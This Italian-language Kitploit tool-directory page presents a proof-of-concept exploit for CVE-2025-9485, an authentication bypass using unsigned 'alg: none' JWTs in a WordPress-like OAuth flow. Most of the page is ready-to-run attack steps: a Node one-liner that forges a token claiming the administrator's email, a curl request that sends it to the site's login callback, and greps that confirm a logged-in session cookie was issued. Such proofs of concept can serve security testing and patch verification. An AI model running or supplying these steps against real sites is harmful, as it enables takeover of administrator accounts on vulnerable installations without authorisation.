Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-9485 — Proof-of-concept exploit per CVE-2025-9485 che dimostra il bypass dell'autenticazione tramite JWT non firmato (alg: none) in un flusso OAuth simile a WordPress. Include script per la falsificazione del token e l'attivazione del callback. | Kitploit
Strumenti/GitHubGitHub/jfriedli/cve-2025-9485
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazione
GitHubjfriedli/cve-2025-9485

CVE-2025-9485

Proof-of-concept exploit per CVE-2025-9485 che dimostra il bypass dell'autenticazione tramite JWT non firmato (alg: none) in un flusso OAuth simile a WordPress. Include script per la falsificazione del token e l'attivazione del callback.

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit: Bypass dell'autenticazione tramite JWT non firmato (alg: none)

1) Forgiare un JWT non firmato che dichiara l'email dell'amministratore

root@kitploit:~
TOKEN=$(node -e '
function b64u(s){
  return Buffer.from(s).toString("base64")
    .replace(/\+/g,"-")
    .replace(/\//g,"_")
    .replace(/=+$/,"")
}

const header = b64u(JSON.stringify({ alg: "none", typ: "JWT" }));

const now = Math.floor(Date.now()/1000);
const payload = b64u(JSON.stringify({
  iss: "https://evil.example",
  aud: "abc",
  sub: "admin-hijack",
  email: process.env.ADMIN_EMAIL,
  email_verified: "1",
  iat: now,
  exp: now + 3600
}));

console.log(header + "." + payload + ".");
')

echo "$TOKEN"

2) Attivare il callback di autenticazione con falsificato

id_token
root@kitploit:~
curl -i -A "Mozilla/5.0" \
  "$SITE/?code=DUMMY&id_token=$TOKEN&state=$STATE" \
  | tee /tmp/poc_headers.txt

3) Verificare l'autenticazione riuscita

root@kitploit:~
grep -i '^set-cookie: wordpress_logged_in' /tmp/poc_headers.txt
grep -i '^location:' /tmp/poc_headers.txt
Scarica lo strumento